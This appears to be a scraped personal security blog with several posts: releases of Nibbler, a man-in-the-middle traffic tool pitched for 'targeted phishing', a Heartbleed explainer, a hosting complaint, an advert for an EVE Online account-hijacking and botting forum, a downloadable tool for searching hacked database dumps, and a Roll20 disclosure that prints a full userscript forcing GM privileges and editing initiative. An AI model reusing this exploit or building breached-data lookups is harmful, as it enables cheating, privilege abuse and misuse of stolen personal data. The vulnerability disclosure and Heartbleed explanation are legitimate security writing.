Nibbler 0.4 – Better Late Than Never

Nibbler 0.4 introduces a very nice new feature, HTTP Async. When enabled, the program will attempt to correct for one side of the conversation disconnecting. This should hopefully allow nibbler to be set up as a proxy pointing to another site. In addition to this new feature, I’ve added a “Honeypot Mode” that will log all traffic that goes through nibbler to a file. This works excellent in conjunction with the HTTP Async feature for targeted phishing.

In addition, Nibbler now has XOR encryption support. This will allow the tool to strip or apply XOR encryption to any stream that passes through it. It works just like RC4 stripping, the only difference is which radio button you click.

A bug that allowed a user to crash the program by connecting it to itself and sending a packet has been fixed.

before 0.5, expect to see improved HTTP Async and various other features. The HTTP functionality at the moment loses packets if they’re sent in the middle of a socket closure, and this is on the top of the list of bugs to adress. Overall, Nibbler development is continuing along swimmingly.

Please be aware the repo has changed: https://github.com/cryptotoad/Nibbler-2

Nullsec Club – EVE Online Hacking, Botting, and Cheating Forum

Nullsec Club is a brand new forum for people who enjoy playing unfairly in EVE Online. Featuring categories on botting, glitching, account hijacking, and just general gaming, Nullsec Club aims to be your #1 resource for Eve Online shenanigans. Feel free to give us a peek at http://nullsec.club/

LibertyVPS – A Turd Among Polished Turds.

I normally don’t make blog posts with the purpose of talking negatively about a company, but recently I had an experience so bad with LibertyVPS.net that I felt I absolutely had to write about it. LibertyVPS is advertised as a VPS hosting company, but they would be more accurately referred to as a “VPS Gambling Site”, as when you send in your money you can never be sure if you’re actually going to get a VPS.

I decided it would be a safe bet to send in my 0.1 BTC for a month of VPS hosting. The site seemed legitimate enough, and advertised instant setup. Perfect, I thought. After placing an order, I was dismayed to find out that the “Instant Setup” advertised on the home page was a blatant lie. There was no instant setup. In fact, I’m inclined to believe there is no “setup” at all. After waiting for several hours, I was given the root details for a server. Finally! I connected and got to work setting up services.

About an hour after the VPS was set up, our site began to experience random errors. We attempted a reboot, and now the server has been stuck offline ever since. Support is non existent, and will only reply to tickets that are directly complementing their service. Anything else waits in a line that could rival Dr. Rockzo’s coffee table.

I’ve since relocated hosting to SexyVPS.com and my service has been excellent, but I felt the need to share my negative experience with the world. There is absolutely NO excuse for what libertyVPS has been doing. I refuse to let another person get scammed by them.

Nibbler 0.2 Alpha – Official Release

Nibbler is a protocol analysis and fuzzing utility intended for viewing how malware communicates with the C&C. It is also able to manipulate traffic in the conversation, using a traditional man in the middle attack. The idea came to me one day when I was thinking to myself “Wireshark doesn’t cut it, I want to be able to manipulate the stream too.” A day and a half later the most rudimentary version of nibbler was born.

 

After a bit of polishing, I’ve created a semi-presentable version of the software. It’s still got lots of bugs, for example the password recovery features tend to break it and it recovers poorly if one end disconnects making it hard to use on HTTP traffic, but it does what it was made to pretty well.

 

Current Version (0.2 Alpha):

Image

Old Versions:

0.1 – http://i.imgur.com/nlYduFJ.png

 

Features

Able to proxy traffic from A to B over a socket tunnel

Able to monitor traffic communicated over the tunnel it creates

Able to manipulate traffic over the tunnel through packet spoofing

Able to apply packet filters

Able to strip encryption from RC4 protected streams if you have the key

 

Changelog

0.2

fixed lots of crash bugs
moved all forms into 1
fixed move to top on new data (sorry!)
added disconnect button
etc....

 

Please report any bugs you find or suggest any features you’d like to see in this thread. I have some planned, which are below.

 

AES/XOR stripping

multithreading and a GUI for managing all connected parties (long term)

GUI for packet filters (currently they have a class but haven’t been implemented as a part of the GUI)

Packet recording/playback (one side or both sides of conversation)

Counter next to packet spoofer to support sending packets en masse (for flooding bot list, as an example)

 

 

Github (source and binaries): https://github.com/cryptotoad/Nibbler

 

 

 

Nibbler: Traffic analysis and modification using tunnels

Nibbler is a tool I’ve been working on to analyze and modify network traffic. It does this not by hooking the network adapter, but instead by performing a man in the middle attack using a socket tunnel. Nibbler initializes a socket connecting out, and listens on another. When either one receives data, nibbler will send that data from the other socket. This way, each end of the conversation sees Nibbler as their desired host.

Nibbler currently has the following features:

  • Unicode packet logging
  • Hexadecimal packet logging
  • packet editing (send packets as either end of the conversation)
  • packet filters (automatic packet editing as packets come and go)

The following features are planned to be implemented before release:

  • Log all packets to a file
  • Color code each side of the conversation, and give a separate color for spoofed packets.
  • Add an option to record and replay packets from one side of the conversation
  • Add a GUI for managing and toggling filters

Nibbler nibbling on pakkets

 

Nibbler will be released with full source code once the bugs are ironed out. If you’d like to see a particular feature implemented, feel free to leave a comment!

The Telltale Heartbleed

So with the recent publication of the Heartbleed vulnerability, I felt it necesarry to make a post explaining what this is and why you should care. It’s important to give the laymen an explanation that properly expresses the scale of this absolutely massive security flaw.

Heartbleed is a vulnerability in the OpenSSL heartbeat functionality. This vulnerability allows for anyone who can connect to a vulnerable server’s IP to extract portions of the heap from memory. What exactly does this mean? basically, you can grab data from the area of memory that contains almost all of the data a hacker would ever want. The heap stores local variables, which are often things like session data, usernames, passwords, private keys, and lots of other things you wouldn’t want to be exposed to an outsider.

 

What does this mean for the layman? If you don’t run a website, you’re probably fine. You can check the sites you frequent using this tool to see if they’re vulnerable. If they are, you should contact the site owners and link them to this article or to Heartbleed.com so that they know the scale of this bug and how to fix it.

 

What about for webmasters? For the IT competent, this is a fairly simple issue to resolve. For those who aren’t so tech savvy it may be a bit more difficult. The first thing to do is to check if you’re vulnerable. You can use the link above, or you can check your openssl version. The following versions are affected (From heartbleed.com)

Status of different versions:

  • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
  • OpenSSL 1.0.1g is NOT vulnerable
  • OpenSSL 1.0.0 branch is NOT vulnerable
  • OpenSSL 0.9.8 branch is NOT vulnerable

Switch to one of the not vulnerable versions of OpenSSL and you’ll be secured against attacks using this method.

 

It’s important that EVERYONE switch off of the vulnerable openssl libraries, as this vulnerability needs to be eradicated. The threat it poses to the safety of the internet as a place for free exchange of thought is tremendous and I’m sure 3 letter agencies have already begun using it to harvest data, if they weren’t already.

 

Consolidating hacked databases for fun & profit

Many times I’ve encountered the same problem over and over again. I wanted to see all the data about a particular subject, but I didn’t want to have to ctrl-f through tons of .sql dumps to get it. This is a common issue for people in the offensive security industry, as hacked databases can be some of the best sources of information a researcher can get but they’re annoyingly difficult to search through.

I decided this wouldn’t do. As a result, I’ve decided to release my database lookup system. It’s currently built to integrate with a MyBB forum, but it would be trivial to make it standalone. The integration is just for permission management purposes.

The release has all of the following:

A search page that lets you find a user in multiple databases using a simple form

An administration page that lets you add databse dumps into your dblookup (simply paste them in the box and click add) or remove a user from your dblookup (type a search query that will return ONLY the results you want to delete and then hit remove.)

Ability to choose which user groups see 10 per page and which user groups see all results (set statically in search.php)

Download: http://uppit.com/gdl7vtrimeg3/lookup.7z

 

To set it up create a MySQL table named “dblookup” with 2 columns, one called “content” and one called “source”

Roll20 exploitation: How I crit my open lock check and became the DM of my own life

Roll20 Exploitation

-CryptoToad

 

The Roll20 platform exists as a medium for players to play d20 based RPG games online, with no limitations based on geography. The downside to allowing technology to fill the void is always the same thing. Security. This is the main focus of this paper, to bring to light several security failings of roll20 so that the system can be improved. These security holes are all exploitable with player permissions, and grant capabilities normally reserved for DM level participants. These include, but are not limited to, initiative hijacking, fog of war bypass, and layer switching.

Initiative is a very integral feature to most RPG games. If one wished to cheat in a game, this would probably be the single most important feature to gain manipulation of. Unfortunately, with the Roll20 platform this is incredibly simple to do as permissions for the initiative list are not set server side. A client sided change can result in unvalidated data being sent and displayed for everyone.

A proof of concept attack can be carried out using the userscript I have attached. I called the script GMO, which is a spoof on GMO foods and GM in the RPG sense.

GMO allows a player to edit the initiatives in the initiative list, as well as draw on the map and GM layers even with no permissions. The initiative editor can remove someone from initiative if you click their picture. It can also allow you to edit the initiative values belonging to any player or NPC by clicking on them. Editing the name fields will only change the score, not the name.

A video showing the initiative editor in action is available here: https://www.youtube.com/watch?v=wGihe5IINgk

In addition, a player can draw on layers that players are normally unable to draw on. While I don’t have read access to the GM layer in this version, I confirmed my DM could see my text when I tested the vulnerability. I could see the marks I created on the map layer fine, as could others.

Fog of war hacks are also possible using this extension as illustrated here: https://www.youtube.com/watch?v=r1GsWbsfULk

The script source is attatched. It’s a userscript made with scriptish. It’s been patched, and as such is only available for educational purposes. This paper was submitted to roll20 when the bugs were found, hence the present tense. Thanks for understanding.

// ==UserScript==
// @id             1
// @name           GMO
// @version        1.0
// @namespace      
// @author         CryptoToad
// @description    
// @include        http://www.roll20.net/*
// @include        https://www.roll20.net/*
// @include        https://app.roll20.net/*
// @include        https://app.roll20.net/*
// @run-at         document-end
// ==/UserScript==

var delFromInitiative = document.getElementById(‘span’);
// initiative editable ui-droppable
/*

Features
    Initiative Hack (edit, move, delete)
    Layer Hack (edit GM/Map layer as normal player)
    Fog Hack (removes fog of war)
*/

function setInitiativesEditable() {

    var initiativeHTML = document.getElementById(“initiativewindow”);
    
    var allSpans = initiativeHTML.getElementsByTagName(“span”);
    for(i=0;i<allSpans.length;i++) {
    allSpans[i].className = “initiative editable ui-droppable”;
    }
    
    var allImages = initiativeHTML.getElementsByTagName(“img”);
    for(i=0;i<allImages.length;i++) {
    allImages[i].className = “pictos remove”;
    }
    
    var allUl = initiativeHTML.getElementsByTagName(“ul”);
    for(i=0;i<allUl.length;i++) {
        if(allUl[i].className.indexOf(“erlist”) > 1) {
            allUl[i].classname = “characterlist ui-sortable”;
        }
    }
}

function createUIHook() {
    //adds a button that will execute our h4x
    var toolbar = document.getElementById(“floatingtoolbar”);
    toolbar.innerHTML = toolbar.innerHTML + “<li class=\”objects\” id=\”editinglayer\” tip=\”Editing Objects &amp; Tokens\”><span class=\”pictos currentselection\”></span><div class=\”submenu\”><ul><li class=\”choosemap\”><span class=\”pictos\” style=\”padding: 0px 3px 0px 3px;\”>@</span>Map &amp; Background</li><li class=\”chooseobjects\”><span class=\”pictos\”>b</span>Objects &amp; Tokens</li><li class=\”choosegmlayer\”><span class=\”pictos\”>E</span>GM Info Overlay</li></ul></div></li><li id=\”startrounds\” tip=\”Begin Turn-Taking\”><span class=\”pictos\”>t</span></li><li id=\”inithax\”><img src=\”data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABkAAAAZCAYAAADE6YVjAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB94CFRQQFLLQ7rIAAAAZdEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIEdJTVBXgQ4XAAAEkUlEQVRIx6WVS6hkVxWGv7XW3qfqnKpT1dXmmn6YbkMkbUODYqsoUaR74liROHKmE8Gpg4CQZOA4ODGDgA4yjaBOHIgzBUUIEtBBUBoiUYl17XvreR57LwdV1Urk3r6Sf7gf61vPvYWL6yrwKVV9RlW97/u3gTeBfzzuolwQ8HxRFN8ZjyefmF2+NFJRFsvFYrVc/n6xWLwO/Pi8y+ECAAO+rKrPjcYVl6ZTUTVEmK5Xq/v7/TeAxVkG9AKQArjSNI0sFwvJ7sQY2G43rNdrAUZA/KCRDIEPAaSUaJsGEaHretwdYPA4O+dtToFbwHPAjQNks9mQc6bv+8O5yf7Mb4B/AukiEAG+CXwVuAvMRCSYGTFGfA8wM2KI5Jw/6u6vAQ+A3wK/BH4G9OdBin0UNeAiIuN6zOXZZWazGWVZIipMp1Mmkwnz+ZyTk5NZ3/cz4FngJvA28NZ/d877lfah/xT4+WxaUwwGd8uyktlsxnQ6pSxLQtj51/fJU+p/1bbt68ArwKvAX/h/NJuMvl7EcGymHkLwqiy9Ho+9KAoPIXiMYT4aDO49bgbOUqWqz3dt/w0XuRODSVUOeGI2JWenaVpCMECsTWnu7u+dNf1nQW6b2Yuq+gIit0XEJ6MRt55+Su7e+Th9yvQp47h3fTJ3/7yIfFFEhu7+B6B73DDeUNWXReRbQAXg7rg7144uc/1oRjRlOCjo+0RKyd1d3f2OiHzfzF7et/WZEIkxfs7MvvJoQUQAOVks+dt7c1JKVMOC1XrNZtsAiO8FFKr6bTP7zLnpijGuReSGiNx29wOE7HCyWMn84Snzh6ccn5zSdj2qiuyEmaGqv4gx/qjruuWZkJTSQxF5V0Q+DTy5D0Ycl77vabqObduxXG9xdzkAVFVE5J2U0ktt27553sRfiTHeN7MvuftVVRWAEAJt25Jz5nS5xszgP56Tc0ZVXVWXMcZJzvnaZrN593/+EzO7p6rfFZF77j4QEWKM1HWNqrJYLGiaZldIVdydEALD4ZCu68g54+7knDci8lbO+Y3tdvtDYHFIV1FV1ffM7GvuHg7ehxCYTKdUZYmI0jRbRIR9eqjrmqqqiDEiIuSc6bouuvv1GOP9oihO27b9dQAoy/LDMcbPqiplWaIihBgxM8ajESKKqrJaLWnb9lE0VVVRFAU550dwEcHdiTEa8AXgBwfItRjjk6o7YyEEVPXQbagaZspoNCLnTM6ZGAuGwyEhBNydtm0py5LBYHD4Z8g5P310dHQpAFRVdV1VR6pKSokQAqZGyom2bRjXNapCXdeHDqQoCqqqQlVZr3fNEEKg67pHEHe/YmZPhX3Rr5hZ2BnIvgsbYozS98k9O6oqMQSvqgp3lxgjVVV53/fgLoPBgJx3d1VVVNXdfRpjvLUrsshcVP8oIh9x96yq0UIY7V8EP3jukIOZhBgpioIQgzdN46Iqunt63GEbQ+hUtXH3Uz900p8fPPjJrZs3fxfr+qqIKPAE6CdF/GMiepT6NKZgCKRt0+ZS1cys9+xbd/+XmLWktHL3v3rOfxKRv5vZSlVPj4+P3/k3DtwEdqL9t2QAAAAASUVORK5CYII=\” ></li>”
    toolbar.innerHTML = toolbar.innerHTML + “<li class=\”reveal\” id=\”fogcontrols\” tip=\”Reveal Areas\”><span class=\”pictos currentselection\”></span><div class=\”submenu\”><ul><li class=\”choosereveal\”><span class=\”pictos\”>E</span>Reveal Areas</li><li original-title=\”Hold Shift to snap to grid, Ctrl+Z to undo last point, right-click or Esc to complete\” class=\”choosepolygonreveal showtip tipsy-w\”><span class=\”pictosthree\” style=\”font-size: 1.3em;\”>c</span>Polygon Reveal</li><li class=\”choosehide\”><span class=\”pictos\”>C</span>Hide Areas</li><li class=\”chooseclearfog showtip tipsy-w\” title=\”Reset map back to completely hidden from players (can speed up rendering if you’ve revealed many small areas)\”><span class=\”pictos\” style=\”position: relative\”>#</span>Reset Fog</li></ul></div></li>”;
    toolbar.innerHTML = toolbar.innerHTML + “<li id=\”blueberry\”>B</li>”
    
    document.getElementById(“inithax”).addEventListener(“click”, uihookClick, false);
    document.getElementById(“blueberry”).addEventListener(“click”, blueberryClick, false);
    }

function uihookClick() {
    //code to be executed on clicking of our h4x button
    setInitiativesEditable();
}
function blueberryClick() {
    //code to be executed on clicking of our blueberry
    var editorHTML = document.getElementsByTagName(“script”)[1];
    alert(unsafeWindow.d20_player_id);
    unsafeWindow.d20_player_id=”-JGg-A0GmNhnkP2PvITo”;
    Object.defineProperty(unsafeWindow, “is_gm”, { value : true, writable : false });
    alert(unsafeWindow.d20_player_id);
}

createUIHook();

Continue reading

Dr. Sploitlove – How I came to Stop Worrying and Love the Blog

Hello everyone. My name’s CryptoToad, and I’m a security minded individual looking to make an impact in the scene. In my free time, I’m either analyzing malware, finding a vulnerability, coding a proof of concept, or playing D&D. In the future, you can expect to see me posting analyses, samples, proofs of concept, and other scene related information. I’ll be trying to post at least once a week, so stay tuned for lots of fun and excitement!

Image